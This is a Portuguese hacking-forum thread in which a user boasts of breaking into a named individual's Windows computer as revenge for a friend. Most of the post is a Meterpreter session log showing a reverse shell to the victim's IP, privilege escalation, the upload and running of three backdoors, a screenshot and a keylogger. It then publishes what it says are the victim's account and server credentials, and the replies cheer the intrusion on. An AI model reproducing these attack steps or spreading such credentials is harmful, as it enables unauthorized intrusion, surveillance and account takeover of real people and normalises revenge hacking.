Hoje fui caçador, this was for you Joseph

ShadowVDS

Membro

Registrado em: Mar 2010
Posts: 65

Font Size

Artigo Hoje fui caçador, this was for you Joseph

04-10-2011, 20:19

Hey, esse post foi tirado do meu blog, feito especialmente pra comunidades da EBR e da Orkut Exploits do orkut, mas acho bom compartilhar aqui tamben.

Boa Leitura.

----------------------------------------------------------------------------------------------------------------------------------------------------------

A umas semanas o joseph veio me falar, no msn que tinha levado um calote, ele colocou milhares de seguidores pra um cara e ele não tinha pagado e por cima denuncio a conta dele do twitter ate ser deletada, ae ele me disse, eu como um bom amigo levei como se tive-se sido com migo. Quem vez isso? Nosso velho e bom paraiba DarK MisT.

Então entrei na briga, segue a exploracao:

Código:

[*] Sending stage (752128 bytes) to 189.70.168.229[*] Meterpreter session 1 opened (192.168.0.103:53 -> 189.70.168.229:33725) at Fri Sep 30 12:07:02 -0300 2011

msf  exploit(handler) > sessions -i 1[*] Starting interaction with 1...

meterpreter > getpid
Current pid: 768
meterpreter > ps

Process list
============

 PID   Name                    Arch  Session  User                                                                                          Path
 ---   ----                    ----  -------  ----                                                                                          ----
 0     [System Process]
 4     System                  x86   0
 280   smss.exe                x86   0        AUTORIDADE NT\SISTEMA                                                                         \SystemRoot\System32\smss.exe
 384   csrss.exe               x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\csrss.exe
 436   wininit.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\wininit.exe
 444   csrss.exe               x86   1        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\csrss.exe
 500   winlogon.exe            x86   1        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\winlogon.exe
 536   services.exe            x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\services.exe
 552   lsass.exe               x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\lsass.exe
 560   lsm.exe                 x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\lsm.exe
 664   svchost.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\svchost.exe
 752   svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445  C:\Windows\system32\svchost.exe
 828   svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\System32\svchost.exe
 880   svchost.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\System32\svchost.exe
 908   svchost.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\svchost.exe
 1052  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\svchost.exe
 1168  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445  C:\Windows\system32\svchost.exe
 1380  spoolsv.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\System32\spoolsv.exe
 1416  sched.exe               x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\Avira\AntiVir Desktop\sched.exe
 1436  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\svchost.exe
 1572  taskhost.exe            x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Windows\system32\taskhost.exe
 1636  dwm.exe                 x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Windows\system32\Dwm.exe
 1688  explorer.exe            x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Windows\Explorer.EXE
 1788  WVSScheduler.exe        x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\Acunetix\Web Vulnerability Scanner 6\WVSScheduler.exe
 2024  avguard.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\Avira\AntiVir Desktop\avguard.exe
 448   RaRegistry.exe          x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\Ralink\Common\RaRegistry.exe
 976   svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\svchost.exe
 1208  avshadow.exe            x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
 1248  conhost.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\conhost.exe
 1544  TeamViewer_Service.exe  x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
 972   avgnt.exe               x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
 1608  jusched.exe             x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1752  msnmsgr.exe             x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 952   IDMan.exe               x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Internet Download Manager\IDMan.exe
 2068  ApUI.exe                x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Ralink\Common\ApUI.exe
 2544  IEMonitor.exe           x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Internet Download Manager\IEMonitor.exe
 2880  alg.exe                 x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\System32\alg.exe
 2908  SearchIndexer.exe       x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\SearchIndexer.exe
 2972  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\svchost.exe
 3080  WUDFHost.exe            x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\WUDFHost.exe
 3216  svchost.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\System32\svchost.exe
 3256  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445  C:\Windows\system32\svchost.exe
 3408  wmpnetwk.exe            x86   0        $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445  C:\Program Files\Windows Media Player\wmpnetwk.exe
 2060  svchost.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\System32\svchost.exe
 3628  wlcomm.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Windows Live\Contacts\wlcomm.exe
 3732  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 1888  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 2840  rundll32.exe            x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Windows\system32\rundll32.exe
 2352  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 2824  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 1564  msnmsgr.exe             x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 6084  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 5436  audiodg.exe             x86   0        $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c        C:\Windows\system32\AUDIODG.EXE
 4672  wmplayer.exe            x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Windows Media Player\wmplayer.exe
 4448  chrome.exe              x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe
 840   Skype.exe               x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Program Files\Skype\Phone\Skype.exe
 1520  taskhost.exe            x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Windows\system32\taskhost.exe
 6040  SearchProtocolHost.exe  x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\SearchProtocolHost.exe
 768   sqli.exe                x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\windows\system32\sqli.exe
 5860  MpCmdRun.exe            x86   0        $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445  c:\program files\windows defender\MpCmdRun.exe
 4948  SearchFilterHost.exe    x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\SearchFilterHost.exe
 5560  SQLInjection.exe        x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\Users\Tiago Augusto\Desktop\kl\SQL INJECTION 1.2\SQLInjection.exe
 5468  SQLInjection2.exe       x86   1        TiagoAugusto-PC\Tiago Augusto                                                                 C:\windows\system32\SQLInjection2.exe
 5584  taskeng.exe             x86   0        AUTORIDADE NT\SISTEMA                                                                         C:\Windows\system32\taskeng.exe

meterpreter > migrate 1688[*] Migrating to 1688...[*] Migration completed successfully.
meterpreter > getuid
Server username: TiagoAugusto-PC\Tiago Augusto
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege

meterpreter > getsystem
...got system (via technique 1).
meterpreter > pwd
C:\windows\temp
meterpreter > upload server.exe[*] uploading  : server.exe -> server.exe[*] uploaded   : server.exe -> server.exe
meterpreter > shell
Process 5064 created.
Channel 2 created.
Microsoft Windows [versÆo 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.

C:\Windows\system32>cd ..
cd ..

C:\Windows>cd temp
cd temp

C:\Windows\Temp>dir
dir
 O volume na unidade C nÆo tem nome.
 O N£mero de Srie do Volume  08DE-5B69

 Pasta de C:\Windows\Temp

30/09/2011  12:11              .
30/09/2011  12:11              ..
27/09/2011  17:44              AVSETUP_4e823599
10/08/2011  22:06              BdeSqm
21/09/2011  22:01               660 coinlog.log
30/09/2011  12:07            57.054 MpCmdRun.log
27/09/2011  17:48            11.346 MpSigStub.log
07/09/2011  16:03               992 MSI8e45d.LOG
02/08/2011  21:58               992 MSIe3e4e.LOG
30/09/2011  12:11           380.166 server.exe
               6 arquivo(s)        451.210 bytes
               4 pasta(s)   122.101.477.376 bytes dispon¡veis

C:\Windows\Temp>server.exe
server.exe

C:\Windows\Temp>exit
meterpreter > screenshot
Screenshot saved to: /root/NRNRHjXv.jpeg
meterpreter > upload
upload .DCOPserver_bt_:0 upload .gconfd           upload .nano_history
upload .DCOPserver_bt__0 upload .gem              upload .profile
upload .ICEauthority     upload .gentoorc         upload .qt
upload .Xauthority       upload .gnome2           upload .ssh
upload .adobe            upload .gnome2_private   upload .subversion
upload .aptitude         upload .gtk_qt_engine_rc upload .thumbnails
upload .bash_history     upload .gtkrc-2.0        upload .wine
upload .bashrc           upload .java             upload .wireshark
upload .config           upload .kde              upload .xchat2
upload .conky_scripts    upload .kde3             upload .xcompmgrrc
upload .conkyrc          upload .liferea_1.4      upload .xinitrc
upload .dbus             upload .local            upload NRNRHjXv.jpeg
upload .debtags          upload .macromedia       upload autopython
upload .directory        upload .mcop             upload scvr.exe
upload .dragon           upload .mozilla          upload server.exe
upload .esd_auth         upload .msf3             upload sqli.exe
upload .fluxbox          upload .msf4             upload teste
upload .gconf            upload .mysql_history    upload tudo
meterpreter > upload scvr.exe[*] uploading  : scvr.exe -> scvr.exe[*] uploaded   : scvr.exe -> scvr.exe
meterpreter > shell
Process 3988 created.
Channel 4 created.
Microsoft Windows [versÆo 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.

C:\Windows\system32>cd ..
cd ..

C:\Windows>cd temp
cd temp

C:\Windows\Temp>dir
dir
 O volume na unidade C nÆo tem nome.
 O N£mero de Srie do Volume  08DE-5B69

 Pasta de C:\Windows\Temp

30/09/2011  12:13              .
30/09/2011  12:13              ..
27/09/2011  17:44              AVSETUP_4e823599
10/08/2011  22:06              BdeSqm
21/09/2011  22:01               660 coinlog.log
30/09/2011  12:07            57.054 MpCmdRun.log
27/09/2011  17:48            11.346 MpSigStub.log
07/09/2011  16:03               992 MSI8e45d.LOG
02/08/2011  21:58               992 MSIe3e4e.LOG
30/09/2011  12:13           442.922 scvr.exe
               6 arquivo(s)        513.966 bytes
               4 pasta(s)   122.099.466.240 bytes dispon¡veis

C:\Windows\Temp>scvr.exe
scvr.exe

C:\Windows\Temp>exit

meterpreter > ipconfig

Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

NIC Fast Ethernet PCI-E Realtek Família RTL8101E (NDIS 6.20)
Hardware MAC: 00:21:85:90:e0:3d
IP Address  : 192.168.1.64
Netmask     : 255.255.255.0

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
IRC [e pra cc kk  Room Unix
meterpreter > background
msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  TiagoAugusto-PC\Tiago Augusto @ TIAGOAUGUSTO-PC  192.168.0.103:53 -> 189.70.168.229:33725

msf  exploit(handler) >

Backdoorizei o computador dele com 3 backdoors, se voce tiver lendo isso, sorry so formatando agora LOL

Hum … achei o twitter dele … acho que o joseph que vai gostar disso:

DarKMisTBR
carro123

Ok ok ok, tamben temos uns acesso a uns servidores dele pelo que parece:

================================================== ======================

robertolek@live.com:carro123

212.124.113.76
admin
radiohits

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

well
cassolla159

================================================== ======================

Hum ….. que coisinha linda

Só nao postei o email pessoal dele com senha pois sou bomsinho.

Vamos deixar o orkut dele com ele por enquando, pra da pra ele vim aqui reclamar rs

HUm …. acho que só, a senha do tão querido twitter dele com 29 k de seguidores ta com joseph e só ele desside se recuperar ou não, recomendo que ele devolva se ele pedir descupa pela sacanagem que fez com ele, gravar tudo e posta aqui.

Agora pergunto pra voces, achão que exagerei?

Acho que por um amigo nunca é exagero, agora vou ir ri um pouco LOOOOOOOOOOOOOOOOL

Blog: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Tags: Nenhum(a)

kapu

Membro

Registrado em: Oct 2011

Posts: 13
- Share
- Tweet
Font Size

#2

24-10-2011, 23:54

to na mesma opinião por um amigo nunca é exagero !!!
Top
Comment
4linux-

Membro

Registrado em: Oct 2011

Posts: 122
- Share
- Tweet
Font Size

#3

30-10-2011, 23:43

kkkkkkkkkkkkkkkkkkkk. essa foi boa rapaz. parabens e sucesso
Top
Comment
H4S_KJ27

Estudante de Engenharia Social

Registrado em: Oct 2010

Posts: 315
- Share
- Tweet
Font Size

#4

31-10-2011, 21:15

se o cara for realmente o seu melhor amigo, você não exagerou nada não. kkk mais foi bom o que você fez ^^

Se você é fã! Use!
_ - _ _ - _ _ - _ _ - _
.
Top
Comment

Anterior template Avançar

Unconfigured Ad Widget

Anúncio

Hoje fui caçador, this was for you Joseph

Artigo Hoje fui caçador, this was for you Joseph

Comment

Comment

Comment